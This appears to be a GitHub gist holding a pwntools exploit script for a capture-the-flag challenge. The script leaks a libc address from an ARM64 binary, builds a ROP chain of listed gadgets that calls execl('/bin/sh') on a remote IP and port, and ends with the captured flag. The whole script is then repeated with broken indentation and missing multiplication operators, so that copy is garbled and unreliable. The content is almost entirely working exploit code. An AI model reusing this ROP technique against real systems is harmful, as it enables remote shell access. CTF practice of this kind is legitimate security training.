ikerl/strong-arm.py Secret

## strong-arm.py
#!/bin/python3

from pwn import *

# Libc gadgets (libc-2.23.so)
# 0x0000000000076cb0: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
# 0x000000000002b850: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
# 0x00000000000ffab4: mov x1, x19; cbnz x19, #0xffaa4; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;


# Libc gadgets (libc-2.31.so)
# 0x000000000006ee5c: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
# 0x000000000004514c: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
# x000000000007d304: mov x1, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;

context.binary = "./arm"
binary = './arm'

#p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", "-g", "4444" ,binary])

elf = ELF("./arm")


libc_version = "remote"

if libc_version == "local":
    libc = ELF("/usr/aarch64-linux-gnu/lib/libc-2.31.so")
    p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", binary])
else:
    libc = ELF("./libc-2.23.so")
    p = remote("172.104.14.64",54732)
    p.readline()

leak = p.readline()
leaked_pointer = int(str(leak).split(" ")[-1].replace("0x","").replace("\\n'",""),16)

libc_execl_offset = libc.symbols["execl"]
libc_bin_sh_offset = next(libc.search(b"/bin/sh"))
libc_printf_offset = libc.symbols["printf"]
libc_exit_offset = libc.symbols["exit"]
print(libc_printf_offset)

printf_leak_address = leaked_pointer
libc_base = printf_leak_address - libc_printf_offset

execl_ptr = libc_execl_offset + libc_base
binsh_ptr = libc_bin_sh_offset + libc_base
exit_ptr = libc_exit_offset + libc_base


log.info("Leaked printf ptr: {}".format(hex(printf_leak_address)))
log.info("Execl function ptr: {}".format(hex(execl_ptr)))
log.info("BinSh str ptr: {}".format(hex(binsh_ptr)))

if libc_version == "local":
    x21_gadget = p64(0x6ee5c+libc_base)
    copy_x21_x0 = p64(0x4514c+libc_base)
    clear_x1 = p64(0x7d304+libc_base)
else:
    x21_gadget = p64(0x76cb0+libc_base)
    copy_x21_x0 = p64(0x2b850+libc_base)
    clear_x1 = p64(0xffab4+libc_base)

offset_sp = 128
offset_x30 = 136

f_execl = p64(execl_ptr)
binsh = p64(binsh_ptr)
f_exit = p64(exit_ptr)

p.recvuntil("> ")

x21_val = binsh

# EXECL
# x0 : /bin/sh
# x1: NULL

payload = binsh*17 + x21_gadget + 24*b"B" + copy_x21_x0 + 16*b"C" + x21_val + 16*b"D" + clear_x1 + b"\x00"*40 + f_execl*10

p.sendline(payload + 100*binsh)

p.interactive()

# WPI{a1ARM3d_arM315}
	#!/bin/python3

	from pwn import *

	# Libc gadgets (libc-2.23.so)
	# 0x0000000000076cb0: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
	# 0x000000000002b850: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
	# 0x00000000000ffab4: mov x1, x19; cbnz x19, #0xffaa4; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;


	# Libc gadgets (libc-2.31.so)
	# 0x000000000006ee5c: ldr x21, [sp, #0x20]; mov x0, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
	# 0x000000000004514c: mov x0, x21; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
	# x000000000007d304: mov x1, x19; ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;

	context.binary = "./arm"
	binary = './arm'

	#p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", "-g", "4444" ,binary])

	elf = ELF("./arm")


	libc_version = "remote"

	if libc_version == "local":
	libc = ELF("/usr/aarch64-linux-gnu/lib/libc-2.31.so")
	p = process(["qemu-aarch64-static", "-L", "/usr/aarch64-linux-gnu/", binary])
	else:
	libc = ELF("./libc-2.23.so")
	p = remote("172.104.14.64",54732)
	p.readline()

	leak = p.readline()
	leaked_pointer = int(str(leak).split(" ")[-1].replace("0x","").replace("\\n'",""),16)

	libc_execl_offset = libc.symbols["execl"]
	libc_bin_sh_offset = next(libc.search(b"/bin/sh"))
	libc_printf_offset = libc.symbols["printf"]
	libc_exit_offset = libc.symbols["exit"]
	print(libc_printf_offset)

	printf_leak_address = leaked_pointer
	libc_base = printf_leak_address - libc_printf_offset

	execl_ptr = libc_execl_offset + libc_base
	binsh_ptr = libc_bin_sh_offset + libc_base
	exit_ptr = libc_exit_offset + libc_base


	log.info("Leaked printf ptr: {}".format(hex(printf_leak_address)))
	log.info("Execl function ptr: {}".format(hex(execl_ptr)))
	log.info("BinSh str ptr: {}".format(hex(binsh_ptr)))

	if libc_version == "local":
	x21_gadget = p64(0x6ee5c+libc_base)
	copy_x21_x0 = p64(0x4514c+libc_base)
	clear_x1 = p64(0x7d304+libc_base)
	else:
	x21_gadget = p64(0x76cb0+libc_base)
	copy_x21_x0 = p64(0x2b850+libc_base)
	clear_x1 = p64(0xffab4+libc_base)

	offset_sp = 128
	offset_x30 = 136

	f_execl = p64(execl_ptr)
	binsh = p64(binsh_ptr)
	f_exit = p64(exit_ptr)

	p.recvuntil("> ")

	x21_val = binsh

	# EXECL
	# x0 : /bin/sh
	# x1: NULL

	payload = binsh17 + x21_gadget + 24b"B" + copy_x21_x0 + 16b"C" + x21_val + 16b"D" + clear_x1 + b"\x00"40 + f_execl10

	p.sendline(payload + 100*binsh)

	p.interactive()

	# WPI{a1ARM3d_arM315}